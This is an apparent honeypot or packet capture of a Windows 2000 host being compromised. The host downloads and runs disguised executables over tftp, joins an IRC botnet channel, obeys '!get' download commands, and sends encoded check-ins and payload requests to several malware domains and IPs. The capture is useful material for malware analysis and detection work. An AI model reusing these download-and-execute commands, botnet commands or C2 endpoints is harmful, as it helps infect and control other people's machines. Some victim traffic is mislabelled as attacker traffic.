VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
    C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\wins
    File Not Found
    C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\dllcache
    File Not Found
    C:\\WINNT\\system32>
VICTIM: tftp -i 202.124.5.37 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: Transfer successful: 25360 bytes in 9 seconds, 2817 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 202.124.5.37 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: Transfer successful: 15872 bytes in 5 seconds, 3174 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK tjkyxuur
    USER y020500 . . :_
VICTIM: Service Pack 2
    JOIN &virtu
ATTACKER: :u. PRIVMSG tjkyxuur :!get http:/bb.iwillhavebigdick.com/kp.exe
    :u. PRIVMSG tjkyxuur :!get http:/www.derquda.com/kb8.txt
VICTIM: GET /kp.exe HTTP/1.0
    User-Agent: Download
    Host: bb.iwillhavebigdick.com
    Pragma: no-cache
ATTACKER: GET /kb8.txt HTTP/1.0
    User-Agent: Download
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/mno3.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/lmn2.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/klm1.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/nop4.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /list.php?c=AEB60ADDBD0BBF131BFCCAE2A7E2C819EF76C7FC85B6EB7688CA3663CC6B9FB6132DDFC22E5999F7FF86C75DB4F194B6B2480DFA0C754E147A15&v=2&t=0.7380182 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: exe3.perfectexe.com:255
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /cs.gif?t=0.829632 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: sb.perfectexe.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /list.php?c=5D45EE3941F7A20E25C29EB65C1918C9B029764DA794F4691B596D3857F06E47556B0A17DEA9FB958CF5128804411331E51F6394394036677004&v=2&t=0.046673 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /upload/int.exe?t=0.7065851 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: anotherdomainname.in
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=2A34C0240D9DAA0D37DC96BEDDA78B7AE873C8FDAE8B1BD76C0AE291B413527C2C62B4A34927B1EFF39BED873239799452A4EB5324551C3B437BD27A86FEF19A0C71DCA4797C2BB4665CF08A16F80CD3DF287548F68856507DDF6805F8010379A4C5ACB23E2535A8398AA225797970EA08FFFAD567200720633AC9A6992FD46A0C07DB787A492CEC55634A198D4D1269&t=0.4770319 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: exe3.perfectexe.com:255
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=5947C723B929E34457BC4E66E3996998F8631B2EB491905CF4920F7C58FF634D7D33ACBB1A7490CEDBB3274D2A2119F454A2BF079EEF4D6A4E764EE6B6CEF79CB7CA1E666461D54AA59FFD870CE24C933ACD94A988F6595FCB69F4996F96CBB14120726C978CB02DBF0CB523D8210D8584710D531340D2E01400067373D10CF692823E98F3C35D9C7145732021E9A9294B90&t=0.8495905 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: exe3.perfectexe.com:255
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /state.php?action=install&m=00-0C-29-F7-BD-23 HTTP/1.1
    User-Agent: NetLog2
    Host: sy2.perfectexe.com:85
    Pragma: no-cache
ATTACKER: GET /sn.php?c=D2CC6286BB2BC510DB36AC82ECA4478751F197AD8AAA9156492F6F2700A56F462D578891A8EAE6C8BFD42C45EBD5C72A5AACD960A93785A37B48A903DBA6442A81D0126977A632ADB18BCFB5937D1AC57D8A1E23CEB0363006A42C41EC15453FDFBECED0C0DBDE4314A771F64F4F049E6B9C547B3275FADDE9B0F49B3C8A59E7989CC8645D725F9A88B92F7F&t=0.5585138 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=4B55BB5F04940EDB37DA1638D69E28E86ECE1D27FFDF36F1ED8BE6AE0AAF220B413BE1F87A38F4DAA5CE68010E3000ED6B9D972E43DD5E789DAE5DF719649BF5E3B2D3A81ACBAE31A79DCDB799772EF1788FAF923846C2C4AC0E83EEAC55D8A24A2B4856C5DE9A0726958C1AA8511D954EBB3D635F0CDCEDA5B1BCC99537669CCEDE339F9AAF53904C7B287AAD657C02E705&t=0.8788874 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /1.exe?t=0.6437189 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 109.196.143.133
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu